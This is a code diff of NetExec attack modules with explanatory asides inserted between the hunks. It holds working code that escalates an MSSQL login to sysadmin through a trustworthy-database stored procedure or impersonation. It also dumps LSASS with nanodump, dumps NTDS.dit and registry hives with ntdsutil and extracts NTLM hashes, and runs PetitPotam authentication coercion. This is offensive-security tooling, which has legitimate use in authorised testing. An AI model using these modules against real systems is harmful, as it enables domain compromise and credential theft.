return [database for database in databases if self.is_db_owner(database, exec_as)]
|
||||||
and r.type = 'R' and r.name = N'sysadmin'"""
|
|
||||||
res = self.query_and_get_output(exec_as + query)
|
def find_trusted_databases(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Find trusted databases.
|
||||||
|
|
||||||
|
:param exec_as: The user under whose context the query should be executed. Defaults to an empty string.
|
||||||
|
:type exec_as: str
|
||||||
|
:return: A list of trusted database names.
|
||||||
|
:rtype: list
|
||||||
|
"""
|
||||||
|
query = """
|
||||||
|
SELECT d.name AS DATABASENAME
|
||||||
|
FROM sys.server_principals r
|
||||||
|
INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id
|
||||||
|
INNER JOIN sys.server_principals p ON p.principal_id = m.member_principal_id
|
||||||
|
INNER JOIN sys.databases d ON suser_sname(d.owner_sid) = p.name
|
||||||
|
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')
|
||||||
|
AND r.type = 'R' AND r.name = N'sysadmin'
|
||||||
|
"""
|
||||||
|
result = self.query_and_get_output(exec_as + query)
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
return res
|
return result
|
||||||
|
|
||||||
def check_dbowner_privesc(self, exec_as=""):
|
def check_dbowner_privesc(self, exec_as=""):
|
||||||
|
"""
|
||||||
|
Check if a database owner has privilege escalation.
|
||||||
|
|
||||||
|
:param exec_as: The user to execute the check as. Defaults to an empty string.
|
||||||
|
:type exec_as: str
|
||||||
|
:return: The first trusted database that has a database owner with privilege escalation, or None if no such database is found.
|
||||||
|
:rtype: str or None
|
||||||
|
"""
|
||||||
databases = self.get_databases(exec_as)
|
databases = self.get_databases(exec_as)
|
||||||
dbowner = self.find_dbowner_priv(databases, exec_as)
|
dbowner_privileged_databases = self.find_dbowner_priv(databases, exec_as)
|
||||||
trusted_db = self.find_trusted_db(exec_as)
|
trusted_databases = self.find_trusted_databases(exec_as)
|
||||||
# return the first match
|
|
||||||
for db in dbowner:
|
for db in dbowner_privileged_databases:
|
||||||
if db in trusted_db:
|
if db in trusted_databases:
|
||||||
return db
|
return db
|
||||||
return None
|
|
||||||
|
|
||||||
def do_dbowner_privesc(self, database, exec_as=""):
|
def do_dbowner_privesc(self, database, exec_as=""):
|
||||||
# change context if necessary
|
"""
|
||||||
|
Executes a series of SQL queries to perform a database owner privilege escalation.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
database (str): The name of the database to perform the privilege escalation on.
|
||||||
|
exec_as (str, optional): The username to execute the queries as. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
self.query_and_get_output(exec_as)
|
self.query_and_get_output(exec_as)
|
||||||
# use database
|
|
||||||
self.query_and_get_output(f"use {database};")
|
self.query_and_get_output(f"use {database};")
|
||||||
query = f"""CREATE PROCEDURE sp_elevate_me
|
|
||||||
|
query = """CREATE PROCEDURE sp_elevate_me
|
||||||
WITH EXECUTE AS OWNER
|
WITH EXECUTE AS OWNER
|
||||||
as
|
as
|
||||||
begin
|
begin
|
||||||
EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'
|
EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'
|
||||||
end"""
|
end"""
|
||||||
self.query_and_get_output(query)
|
self.query_and_get_output(query)
|
||||||
|
|
||||||
self.query_and_get_output("EXEC sp_elevate_me;")
|
self.query_and_get_output("EXEC sp_elevate_me;")
|
||||||
self.query_and_get_output("DROP PROCEDURE sp_elevate_me;")
|
self.query_and_get_output("DROP PROCEDURE sp_elevate_me;")
|
||||||
|
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
|
|
||||||
def do_impersonation_privesc(self, username, exec_as=""):
|
def do_impersonation_privesc(self, username, exec_as=""):
|
||||||
|
"""
|
||||||
|
Perform an impersonation privilege escalation by changing the context to the specified user and granting them 'sysadmin' role.
|
||||||
|
|
||||||
|
:param username: The username of the user to escalate privileges for.
|
||||||
|
:type username: str
|
||||||
|
:param exec_as: The username to execute the query as. Defaults to an empty string.
|
||||||
|
:type exec_as: str, optional
|
||||||
|
|
||||||
|
:return: None
|
||||||
|
:rtype: None
|
||||||
|
"""
|
||||||
# change context if necessary
|
# change context if necessary
|
||||||
self.query_and_get_output(exec_as)
|
self.query_and_get_output(exec_as)
|
||||||
# update our privilege
|
# update our privilege
|
||||||
|
@ -264,22 +401,45 @@ class NXCModule:
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
|
|
||||||
def get_impersonate_users(self, exec_as="") -> list:
|
def get_impersonate_users(self, exec_as="") -> list:
|
||||||
|
"""
|
||||||
|
Retrieves a list of users who have the permission to impersonate other users.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
exec_as (str, optional): The context in which the query will be executed. Defaults to "".
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
list: A list of user names who have the permission to impersonate other users.
|
||||||
|
"""
|
||||||
query = """SELECT DISTINCT b.name
|
query = """SELECT DISTINCT b.name
|
||||||
FROM sys.server_permissions a
|
FROM sys.server_permissions a
|
||||||
INNER JOIN sys.server_principals b
|
INNER JOIN sys.server_principals b
|
||||||
ON a.grantor_principal_id = b.principal_id
|
ON a.grantor_principal_id = b.principal_id
|
||||||
WHERE a.permission_name like 'IMPERSONATE%'"""
|
WHERE a.permission_name like 'IMPERSONATE%'"""
|
||||||
res = self.query_and_get_output(exec_as + query)
|
res = self.query_and_get_output(exec_as + query)
|
||||||
# self.context.log.debug(f"Result: {res}")
|
|
||||||
self.revert_context(exec_as)
|
self.revert_context(exec_as)
|
||||||
users = [user["name"] for user in res]
|
return [user["name"] for user in res]
|
||||||
return users
|
|
||||||
|
|
||||||
def remove_sysadmin_priv(self) -> bool:
|
def remove_sysadmin_priv(self) -> bool:
|
||||||
res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
|
"""
|
||||||
|
Remove the sysadmin privilege from the current user.
|
||||||
|
|
||||||
|
:return: True if the sysadmin privilege was successfully removed, False otherwise.
|
||||||
|
:rtype: bool
|
||||||
|
"""
|
||||||
|
self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
|
||||||
return not self.is_admin()
|
return not self.is_admin()
|
||||||
|
|
||||||
def is_admin_user(self, username) -> bool:
|
def is_admin_user(self, username) -> bool:
|
||||||
|
"""
|
||||||
|
Check if the given username belongs to an admin user.
|
||||||
|
|
||||||
|
:param username: The username to check.
|
||||||
|
:type username: str
|
||||||
|
:return: True if the username belongs to an admin user, False otherwise.
|
||||||
|
:rtype: bool
|
||||||
|
"""
|
||||||
res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')")
|
res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')")
|
||||||
try:
|
try:
|
||||||
if int(res):
|
if int(res):
|
||||||
|
@ -287,8 +447,19 @@ class NXCModule:
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
return False
|
return False
|
||||||
except:
|
except Exception:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def revert_context(self, exec_as):
|
def revert_context(self, exec_as):
|
||||||
|
"""
|
||||||
|
Reverts the context for the specified user.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
exec_as (str): The user for whom the context should be reverted.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
self.query_and_get_output("REVERT;" * exec_as.count("EXECUTE"))
|
self.query_and_get_output("REVERT;" * exec_as.count("EXECUTE"))
|
||||||
|
|
|
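Editor's note on two details of the mssql_priv refactor above: sql_exec_as simply concatenates one EXECUTE AS LOGIN statement per grantor in the impersonation path, and revert_context later emits a matching number of REVERT statements by counting "EXECUTE" occurrences. A standalone sketch of that pairing; the function names come from the diff, the grantor names are invented.

def sql_exec_as(grantors):
    # One EXECUTE AS LOGIN per hop in the impersonation path.
    return "".join(f"EXECUTE AS LOGIN = '{g}';" for g in grantors)

def revert_for(exec_as):
    # One REVERT per EXECUTE AS, so the session drops back to the original login.
    return "REVERT;" * exec_as.count("EXECUTE")

chain = sql_exec_as(["low_priv", "dbo_user"])
print(chain)              # EXECUTE AS LOGIN = 'low_priv';EXECUTE AS LOGIN = 'dbo_user';
print(revert_for(chain))  # REVERT;REVERT;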
@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 # nanodump module for nxc python3
 # author of the module : github.com/mpgn
 # nanodump: https://github.com/helpsystems/nanodump
@ -35,7 +33,7 @@ class NXCModule:
         self.module_options = module_options

     def options(self, context, module_options):
-        """
+        r"""
         TMP_DIR             Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
         NANO_PATH           Path where nano.exe is on your system (default: OS temp directory)
         NANO_EXE_NAME       Name of the nano executable (default: nano.exe)
@ -100,7 +98,7 @@ class NXCModule:
         with open(os.path.join(self.nano_path, self.nano), "rb") as nano:
             try:
                 self.context.log.display(f"Copy {self.nano} to {self.remote_tmp_dir}")
-                exec_method = MSSQLEXEC(self.connection.conn)
+                exec_method = MSSQLEXEC(self.connection.conn, self.context.log)
                 exec_method.put_file(nano.read(), self.remote_tmp_dir + self.nano)
                 if exec_method.file_exists(self.remote_tmp_dir + self.nano):
                     self.context.log.success(f"Created file {self.nano} on the remote machine {self.remote_tmp_dir}")
@ -113,20 +111,20 @@ class NXCModule:
         # apparently SMB exec methods treat the output parameter differently than MSSQL (we use it to display())
         # if we don't do this, then SMB doesn't actually return the results of commands, so it appears that the
         # execution fails, which it doesn't
-        display_output = True if self.context.protocol == "smb" else False
+        display_output = self.context.protocol == "smb"
         self.context.log.debug(f"Display Output: {display_output}")
         # get LSASS PID via `tasklist`
         command = 'tasklist /v /fo csv | findstr /i "lsass"'
         self.context.log.display(f"Getting LSASS PID via command {command}")
         p = self.connection.execute(command, display_output)
         self.context.log.debug(f"tasklist Command Result: {p}")
+        if not p or p == "None":
+            self.context.log.fail("Failed to execute command to get LSASS PID")
+            return

         if len(p) == 1:
             p = p[0]

-        if not p or p == "None":
-            self.context.log.fail(f"Failed to execute command to get LSASS PID")
-            return
-
         pid = p.split(",")[1][1:-1]
         self.context.log.debug(f"pid: {pid}")
         timestamp = datetime.today().strftime("%Y%m%d_%H%M")
@ -138,7 +136,7 @@ class NXCModule:
         self.context.log.debug(f"NanoDump Command Result: {p}")

         if not p or p == "None":
-            self.context.log.fail(f"Failed to execute command to execute NanoDump")
+            self.context.log.fail("Failed to execute command to execute NanoDump")
             self.delete_nanodump_binary()
             return

@ -154,7 +152,7 @@ class NXCModule:

         if dump:
             self.context.log.display(f"Copying {nano_log_name} to host")
-            filename = os.path.join(self.dir_result,f"{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log")
+            filename = os.path.join(self.dir_result, f"{self.connection.hostname}_{self.connection.os_arch}_{self.connection.domain}.log")
             if self.context.protocol == "smb":
                 with open(filename, "wb+") as dump_file:
                     try:
@ -190,14 +188,13 @@ class NXCModule:
                     except Exception as e:
                         self.context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on dir {self.remote_tmp_dir}: {e}")

-            fh = open(filename, "r+b")
+            with open(filename, "r+b") as fh:  # needs the "r+b", not "rb" like below
                 fh.seek(0)
                 fh.write(b"\x4d\x44\x4d\x50")
                 fh.seek(4)
                 fh.write(b"\xa7\x93")
                 fh.seek(6)
                 fh.write(b"\x00\x00")
-            fh.close()

             with open(filename, "rb") as dump:
                 try:
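Aside (a sketch, not part of the diff): the byte patching in the nanodump hunk above restores a minidump header, and it can be written as a small standalone function. The file name is hypothetical; the bytes and offsets are the ones in the hunk (the leading bytes spell "MDMP", the next two look like the minidump version field).

# Sketch only: patch a minidump signature back in place, the way the hunk above does.
def restore_minidump_header(path):
    with open(path, "r+b") as fh:        # "r+b" so existing bytes are overwritten in place
        fh.seek(0)
        fh.write(b"\x4d\x44\x4d\x50")    # "MDMP" magic
        fh.seek(4)
        fh.write(b"\xa7\x93")            # assumed: minidump version field
        fh.seek(6)
        fh.write(b"\x00\x00")

# restore_minidump_header("host_x64_domain.log")  # hypothetical example call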
@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 # Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
 # @exploitph @Evi1cg
 # module by @mpgn_x64
@ -49,5 +47,5 @@ class NXCModule:
                 context.log.highlight("")
                 context.log.highlight("VULNERABLE")
                 context.log.highlight("Next step: https://github.com/Ridter/noPac")
-        except OSError as e:
+        except OSError:
             context.log.debug(f"Error connecting to Kerberos (port 88) on {connection.host}")
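Aside (sketch only, not the module's code): the kind of Kerberos reachability check whose failure the except OSError branch above is guarding against. The host name is hypothetical.

import socket

def kerberos_reachable(host, port=88, timeout=3.0):
    """Return True if a TCP connection to the Kerberos port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# kerberos_reachable("dc01.example.local")  # hypothetical target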
@ -41,14 +41,14 @@ class NXCModule:
         self.no_delete = True

     def on_admin_login(self, context, connection):
-        command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)
-        context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location))
+        command = f"powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full {self.tmp_dir}{self.dump_location}' q q\""
+        context.log.display(f"Dumping ntds with ntdsutil.exe to {self.tmp_dir}{self.dump_location}")
         context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
-        context.log.debug("Executing command {}".format(command))
+        context.log.debug(f"Executing command {command}")
         p = connection.execute(command, True)
         context.log.debug(p)
         if "success" in p:
-            context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location))
+            context.log.success(f"NTDS.dit dumped to {self.tmp_dir}{self.dump_location}")
         else:
             context.log.fail("Error while dumping NTDS")
             return
@ -57,53 +57,56 @@ class NXCModule:
         os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
         os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)

-        context.log.display("Copying NTDS dump to %s" % self.dir_result)
+        context.log.display(f"Copying NTDS dump to {self.dir_result}")

         context.log.debug("Copy ntds.dit to host")
         with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
             try:
                 connection.conn.getFile(
                     self.share,
-                    self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit",
+                    f"{self.tmp_share}{self.dump_location}\\Active Directory\\ntds.dit",
                     dump_file.write,
                 )
                 context.log.debug("Copied ntds.dit file")
             except Exception as e:
-                context.log.fail("Error while get ntds.dit file: {}".format(e))
+                context.log.fail(f"Error while get ntds.dit file: {e}")

         context.log.debug("Copy SYSTEM to host")
         with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
             try:
                 connection.conn.getFile(
                     self.share,
-                    self.tmp_share + self.dump_location + "\\" + "registry\\SYSTEM",
+                    f"{self.tmp_share}{self.dump_location}\\registry\\SYSTEM",
                     dump_file.write,
                 )
                 context.log.debug("Copied SYSTEM file")
             except Exception as e:
-                context.log.fail("Error while get SYSTEM file: {}".format(e))
+                context.log.fail(f"Error while get SYSTEM file: {e}")

         context.log.debug("Copy SECURITY to host")
         with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
             try:
                 connection.conn.getFile(
                     self.share,
-                    self.tmp_share + self.dump_location + "\\" + "registry\\SECURITY",
+                    f"{self.tmp_share}{self.dump_location}\\registry\\SECURITY",
                     dump_file.write,
                 )
                 context.log.debug("Copied SECURITY file")
             except Exception as e:
-                context.log.fail("Error while get SECURITY file: {}".format(e))
-        context.log.display("NTDS dump copied to %s" % self.dir_result)
-        try:
-            command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location)
-            p = connection.execute(command, True)
-            context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location))
-        except Exception as e:
-            context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e))
-
-        localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result)
-        bootKey = localOperations.getBootKey()
-        noLMHash = localOperations.checkNoLMHashPolicy()
+                context.log.fail(f"Error while get SECURITY file: {e}")
+        context.log.display(f"NTDS dump copied to {self.dir_result}")
+        try:
+            command = f"rmdir /s /q {self.tmp_dir}{self.dump_location}"
+            p = connection.execute(command, True)
+            context.log.success(f"Deleted {self.tmp_dir}{self.dump_location} remote dump directory")
+        except Exception as e:
+            context.log.fail(f"Error deleting {self.dump_location} remote directory on share {self.share}: {e}")
+
+        local_operations = LocalOperations(f"{self.dir_result}/registry/SYSTEM")
+        boot_key = local_operations.getBootKey()
+        no_lm_hash = local_operations.checkNoLMHashPolicy()

         host_id = context.db.get_hosts(filter_term=connection.host)[0][0]

@ -118,20 +121,20 @@ class NXCModule:
             context.log.highlight(ntds_hash)
             if ntds_hash.find("$") == -1:
                 if ntds_hash.find("\\") != -1:
-                    domain, hash = ntds_hash.split("\\")
+                    domain, clean_hash = ntds_hash.split("\\")
                 else:
                     domain = connection.domain
-                    hash = ntds_hash
+                    clean_hash = ntds_hash

                 try:
-                    username, _, lmhash, nthash, _, _, _ = hash.split(":")
-                    parsed_hash = ":".join((lmhash, nthash))
+                    username, _, lmhash, nthash, _, _, _ = clean_hash.split(":")
+                    parsed_hash = f"{lmhash}:{nthash}"
                     if validate_ntlm(parsed_hash):
                         context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
                         add_ntds_hash.added_to_db += 1
                         return
                     raise
-                except:
+                except Exception:
                     context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")
             else:
                 context.log.debug("Dumped hash is a computer account, not adding to db")
@ -140,11 +143,11 @@ class NXCModule:
         add_ntds_hash.added_to_db = 0

         NTDS = NTDSHashes(
-            "%s/Active Directory/ntds.dit" % self.dir_result,
-            bootKey,
+            f"{self.dir_result}/Active Directory/ntds.dit",
+            boot_key,
             isRemote=False,
             history=False,
-            noLMHash=noLMHash,
+            noLMHash=no_lm_hash,
             remoteOps=None,
             useVSSMethod=True,
             justNTLM=True,
@ -159,22 +162,17 @@ class NXCModule:
         try:
             context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")
             NTDS.dump()
-            context.log.success(
-                "Dumped {} NTDS hashes to {} of which {} were added to the database".format(
-                    highlight(add_ntds_hash.ntds_hashes),
-                    connection.output_filename + ".ntds",
-                    highlight(add_ntds_hash.added_to_db),
-                )
-            )
+            context.log.success(f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {connection.output_filename}.ntds of which {highlight(add_ntds_hash.added_to_db)} were added to the database")
             context.log.display("To extract only enabled accounts from the output file, run the following command: ")
-            context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds"))
+            context.log.display(f"grep -iv disabled {connection.output_filename}.ntds | cut -d ':' -f1")
         except Exception as e:
             context.log.fail(e)

         NTDS.finish()

         if self.no_delete:
-            context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result)
-            context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))
+            context.log.display(f"Raw NTDS dump copied to {self.dir_result}, parse it with:")
+            context.log.display(f"secretsdump.py -system '{self.dir_result}/registry/SYSTEM' -security '{self.dir_result}/registry/SECURITY' -ntds '{self.dir_result}/Active Directory/ntds.dit' LOCAL")
         else:
             shutil.rmtree(self.dir_result)
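Aside (a sketch with a made-up record, not part of the diff): how the add_ntds_hash() logic above splits a secretsdump-style line into the pieces it stores in the database.

# Made-up sample line; the LM/NT values below are the well-known "empty" hashes.
line = "EXAMPLE\\jdoe:1104:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"

domain, clean_hash = line.split("\\") if "\\" in line else ("EXAMPLE", line)
username, _, lmhash, nthash, _, _, _ = clean_hash.split(":")
parsed_hash = f"{lmhash}:{nthash}"
print(username, parsed_hash)  # jdoe <lmhash>:<nthash>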
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from impacket.dcerpc.v5 import rrp
 from impacket.examples.secretsdump import RemoteOperations
 from impacket.dcerpc.v5.rrp import DCERPCSessionError
@ -10,10 +7,11 @@ class NXCModule:
     """
     Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
     Module by @Tw1sm
+    Modified by Deft (08/02/2024)
     """

     name = "ntlmv1"
-    description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
+    description = "Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)"
     supported_protocols = ["smb"]
     opsec_safe = True
     multiple_hosts = True
@ -35,19 +33,22 @@ class NXCModule:
                 "SYSTEM\\CurrentControlSet\\Control\\Lsa",
             )
             key_handle = ans["phkResult"]
-            rtype = None
-            data = None
+            rtype = data = None
             try:
                 rtype, data = rrp.hBaseRegQueryValue(
                     remote_ops._RemoteOperations__rrp,
                     key_handle,
                     "lmcompatibilitylevel\x00",
                 )
-            except rrp.DCERPCSessionError as e:
-                context.log.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
-
-            if rtype and data and int(data) in [0, 1, 2]:
+            except rrp.DCERPCSessionError:
+                context.log.debug("Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
+
+            # Changed by Defte
+            # Unless this keys is set to 3 or higher, NTLMv1 can be used
+            if data in [0, 1, 2]:
                 context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))

         except DCERPCSessionError as e:
             context.log.debug(f"Error connecting to RemoteRegistry: {e}")
         finally:
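Aside (sketch only, mirroring the comment in the hunk above): the check the module performs on LmCompatibilityLevel can be expressed as a tiny predicate — anything below 3 leaves NTLMv1 negotiable, and a missing value is treated as "probably not set" rather than vulnerable.

def ntlmv1_allowed(lmcompatibilitylevel):
    """Return True only for an explicit 0, 1 or 2, like the module's check."""
    return lmcompatibilitylevel in (0, 1, 2)

print(ntlmv1_allowed(2))     # True
print(ntlmv1_allowed(5))     # False
print(ntlmv1_allowed(None))  # False (value not set / not readable)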
@ -0,0 +1,84 @@
+#!/usr/bin/env python3
+
+from datetime import datetime, timedelta
+from nxc.paths import NXC_PATH
+import socket
+
+
+class NXCModule:
+    """
+    Extract obsolete operating systems from LDAP
+    Module by Brandon Fisher @shad0wcntr0ller
+    """
+    name = "obsolete"
+    description = "Extract all obsolete operating systems from LDAP"
+    supported_protocols = ["ldap"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def ldap_time_to_datetime(self, ldap_time):
+        """Convert an LDAP timestamp to a datetime object."""
+        if ldap_time == "0":  # Account for never-set passwords
+            return "Never"
+        try:
+            epoch = datetime(1601, 1, 1) + timedelta(seconds=int(ldap_time) / 10000000)
+            return epoch.strftime("%Y-%m-%d %H:%M:%S")
+        except Exception:
+            return "Conversion Error"
+
+    def options(self, context, module_options):
+        """No module-specific options required."""
+
+    def on_login(self, context, connection):
+        search_filter = ("(&(objectclass=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))"
+                         "(|(operatingSystem=*Windows 6*)(operatingSystem=*Windows 2000*)"
+                         "(operatingSystem=*Windows XP*)(operatingSystem=*Windows Vista*)"
+                         "(operatingSystem=*Windows 7*)(operatingSystem=*Windows 8*)"
+                         "(operatingSystem=*Windows 8.1*)(operatingSystem=*Windows Server 2003*)"
+                         "(operatingSystem=*Windows Server 2008*)(operatingSystem=*Windows Server 2012*)))")
+        attributes = ["name", "operatingSystem", "dNSHostName", "pwdLastSet"]
+
+        try:
+            context.log.debug(f"Search Filter={search_filter}")
+            resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
+        except Exception:
+            context.log.error("LDAP search error:", exc_info=True)
+            return False
+
+        answers = []
+        context.log.debug(f"Total of records returned {len(resp)}")
+
+        for item in resp:
+            if "attributes" not in item:
+                continue
+            dns_hostname, pwd_last_set = "", "0"  # Default '0' for pwdLastSet
+            for attribute in item["attributes"]:
+                attr_type = str(attribute["type"])
+                if attr_type == "operatingSystem":
+                    os = str(attribute["vals"][0])
+                elif attr_type == "dNSHostName":
+                    dns_hostname = str(attribute["vals"][0])
+                elif attr_type == "pwdLastSet":
+                    pwd_last_set = str(attribute["vals"][0])
+
+            if dns_hostname and os:
+                pwd_last_set_readable = self.ldap_time_to_datetime(pwd_last_set)
+                try:
+                    ip_address = socket.gethostbyname(dns_hostname)
+                    answers.append((dns_hostname, ip_address, os, pwd_last_set_readable))
+                except socket.gaierror:
+                    answers.append((dns_hostname, "N/A", os, pwd_last_set_readable))
+
+        if answers:
+            obsolete_hosts_count = len(answers)
+            filename = f"{NXC_PATH}/logs/{connection.domain}.obsoletehosts.txt"
+            context.log.display(f"{obsolete_hosts_count} Obsolete hosts will be saved to {filename}")
+            with open(filename, "w") as f:
+                for dns_hostname, ip_address, os, pwd_last_set_readable in answers:
+                    log_message = f"{dns_hostname} ({ip_address}) : {os} [pwd-last-set: {pwd_last_set_readable}]"
+                    context.log.highlight(log_message)
+                    f.write(log_message + "\n")
+        else:
+            context.log.display("No Obsolete Hosts Identified")
+
+        return True
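Aside (sketch only): the conversion used by ldap_time_to_datetime() in the new module above, checked standalone. pwdLastSet is a Windows FILETIME, i.e. 100-nanosecond intervals since 1601-01-01; the sample value is made up. Presumably the module is invoked like the other LDAP modules, e.g. with -M obsolete on an ldap target.

from datetime import datetime, timedelta

ldap_time = "133497696000000000"  # made-up sample pwdLastSet value
converted = datetime(1601, 1, 1) + timedelta(seconds=int(ldap_time) / 10000000)
print(converted.strftime("%Y-%m-%d %H:%M:%S"))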
@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 # From https://github.com/topotam/PetitPotam
 # All credit to @topotam
 # Module by @mpgn_x64
@ -67,8 +65,8 @@ class NXCModule:
                 host.signing,
                 petitpotam=True,
             )
-        except Exception as e:
-            context.log.debug(f"Error updating petitpotam status in database")
+        except Exception:
+            context.log.debug("Error updating petitpotam status in database")


 class DCERPCSessionError(DCERPCException):
@ -80,13 +78,9 @@ class DCERPCSessionError(DCERPCException):
         if key in system_errors.ERROR_MESSAGES:
             error_msg_short = system_errors.ERROR_MESSAGES[key][0]
             error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
-            return "EFSR SessionError: code: 0x%x - %s - %s" % (
-                self.error_code,
-                error_msg_short,
-                error_msg_verbose,
-            )
+            return f"EFSR SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
         else:
-            return "EFSR SessionError: unknown error code: 0x%x" % self.error_code
+            return f"EFSR SessionError: unknown error code: 0x{self.error_code:x}"


 ################################################################################
@ -248,18 +242,18 @@ def coerce(
     rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
     dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)

-    context.log.info("[-] Connecting to %s" % binding_params[pipe]["stringBinding"])
+    context.log.info(f"[-] Connecting to {binding_params[pipe]['stringBinding']}")
     try:
         dce.connect()
     except Exception as e:
-        context.log.debug("Something went wrong, check error status => %s" % str(e))
+        context.log.debug(f"Something went wrong, check error status => {e!s}")
         sys.exit()
     context.log.info("[+] Connected!")
-    context.log.info("[+] Binding to %s" % binding_params[pipe]["MSRPC_UUID_EFSR"][0])
+    context.log.info(f"[+] Binding to {binding_params[pipe]['MSRPC_UUID_EFSR'][0]}")
     try:
         dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
     except Exception as e:
-        context.log.debug("Something went wrong, check error status => %s" % str(e))
+        context.log.debug(f"Something went wrong, check error status => {e!s}")
         sys.exit()
     context.log.info("[+] Successfully bound!")
     return dce
@ -268,9 +262,9 @@ def coerce(
 def efs_rpc_open_file_raw(dce, listener, context=None):
     try:
         request = EfsRpcOpenFileRaw()
-        request["fileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
+        request["fileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
         request["Flag"] = 0
-        resp = dce.request(request)
+        dce.request(request)

     except Exception as e:
         if str(e).find("ERROR_BAD_NETPATH") >= 0:
@ -283,14 +277,14 @@ def efs_rpc_open_file_raw(dce, listener, context=None):
             context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
             try:
                 request = EfsRpcEncryptFileSrv()
-                request["FileName"] = "\\\\%s\\test\\Settings.ini\x00" % listener
-                resp = dce.request(request)
+                request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
+                dce.request(request)
             except Exception as e:
                 if str(e).find("ERROR_BAD_NETPATH") >= 0:
                     context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
                     context.log.info("[+] Attack worked!")
                     return True
                 else:
-                    context.log.debug("Something went wrong, check error status => %s" % str(e))
+                    context.log.debug(f"Something went wrong, check error status => {e!s}")
         else:
-            context.log.debug("Something went wrong, check error status => %s" % str(e))
+            context.log.debug(f"Something went wrong, check error status => {e!s}")

File diff suppressed because one or more lines are too long
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import sys
 from impacket import system_errors
 from impacket.dcerpc.v5.rpcrt import DCERPCException
@ -35,9 +32,7 @@ class NXCModule:
         self.port = None

     def options(self, context, module_options):
-        """
-        PORT    Port to check (defaults to 445)
-        """
